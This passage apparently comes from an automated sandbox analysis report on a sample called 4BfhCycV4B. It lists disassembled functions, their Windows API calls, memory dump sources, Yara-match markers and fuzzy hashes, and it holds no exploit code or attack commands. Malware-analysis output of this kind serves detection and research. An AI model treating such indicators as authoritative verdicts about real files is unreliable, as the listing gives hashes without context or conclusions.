                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                                                                        • Instruction ID: c54caae612f79c45943fa80a9590922199881531d53ba21540ab7825707139eb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEF0273530021497CB149B35E80966ABF90EB81714B86405EEE058B242C6759C43CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220542 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,04220D04,042145A4,?,?,?,?,?,042145A4,?,?,?), ref: 04220579
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                                                                        • Instruction ID: f8387cc5e8822ec032f31c2b8219069fe1e708142d4a45efcc6c16149f764ce9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0F05536300216A7CB049F39D80867ABF94FFC2754B8A40AAEF058B290C675A843CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                                                                        • Instruction ID: 26a6103bf3a44b775271bddc1855947db1592e5ed7f4ffd05836c10e882115b1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04209E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00409C12,042095DF), ref: 04209E72
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                                                                        • Instruction ID: 26a6103bf3a44b775271bddc1855947db1592e5ed7f4ffd05836c10e882115b1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                                                                        • Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420F6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                                                                        • Instruction ID: e3753b9ddddb204b9ec520c1acfcf048b1f0d87a85a78670449a5da7ccb5d953
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 935143213F074756EB34492887687FE23E99B06208F1BC94AD942CB2E3E6D5F949C353
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00420C1A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
                                                                                                                                                                                                                                                                                        • Instruction ID: d0f1a20189e36393daad9c8fb7d6be9c176ac9989c87cef9d6c19eed9d752231
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09A012306011008B63104F305D8460C3A94594459034500386004C0020DE304094D708
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041BF69 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: d0dd073aee0751bb9f29e6e223ed45b7845f72cc89632174a73f14db3effea76
                                                                                                                                                                                                                                                                                        • Instruction ID: f7246f358eead72590201e80fcec4c79c46f6691cdae857f55203416c7e6201f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0dd073aee0751bb9f29e6e223ed45b7845f72cc89632174a73f14db3effea76
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38320232E69F014DD7239635CD62336A249AFB73C4F55D737E82AB5AA5EB28C4C34108
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040BFF1 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                        • Instruction ID: 2a58f6a2309fccaa231e80b192b86db65d6159ebe224a31801071a150f3da30d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 939176726080A389E729477984B403FFFE15A513A131A07BFE4F2DE2C5EE38C555E628
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420C258 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                        • Instruction ID: fca44da8dd8aee32f29f62170e31eb44f284a7ff018ce8f72dda7c543f0ef5d8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E49168B23280A34EDB6D467B847403EFFE15A422A1319879EE4F2CB5D6FE64E154D620
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040C2AC Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                        • Instruction ID: ed0e070ae82ea7b03d452a3238dcfa200e972e8fd778a390062a8eb07dfcae26
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B9188721080E38AD729433984B403FFFE15A523A131A47BFD8F2DA2C5EE38D565D624
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420C513 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                        • Instruction ID: 26e3e7e6cce1a1c4f37e1b0b445b0ab4e44c8466e54b2c3ebab5de18549b86a4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C917AB23290A34EDB6D467B847803DFFE15A822A1309979DE4F2CB1D7FE50E154D620
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040BD2A Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e91bfac425e3a666a0d8c6cf14f20edb49d438ec97fef1b2b2bf4ad68d189c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC9153721080A349DB294639857457FFFE1DA513A131A07BFE4F2EB2C1EF3885549AAC
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420BF91 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                        • Instruction ID: 91c01188e7f6c02918a4cfb95b23c460040b0539ebf662bb61e442a3ed6fdd28
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77916AB23290A34EDB2D467F847443EFFE15A422A1319879DE4F2CB5C6FE54E154E620
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040BA80 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                        • Instruction ID: 21a1932339db512cfe7dd20ca352f55fe73c90360b224481a7d01d4506c652c6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 408155722080A34AEB294639847403FFFE1DA513A131A07BFE4F2DA6C5EF38D555966C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420BCE7 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                        • Instruction ID: bc455a28e4e05a4b059756a3f203107642808849becf98d1ff7054a16dcf7b9e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 258167723280A34ADB7D46B9857803EFFE15A422A171A879DE4F2CF5C2FE54F154DA20
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040C6A0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                                                                        • Instruction ID: e6e99f41677c303f580e472dd2adf8d7d27793ec118e7d73ac2b1e44355bdfb2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 301105B7200183C7D6148B6DC8F45B7A795EAC6320B2D437BD441AB7D8D33AA9459E0C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420C907 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                                                                        • Instruction ID: 04480af2766748554754228ac33841df8a5517389e3c7d3c99cf632a35339dbf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D1105F732408B47D71C8E7FD4B42B6E7D5EAC6320B2DC36AD0818B6DAD222B144D608
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042EDB7B Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 042ED000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_42ed000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                        • Instruction ID: 20e2c7f79cbc3f28f53446674f3173b9bb8692f4bb29710808975b3ada1a2ed2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
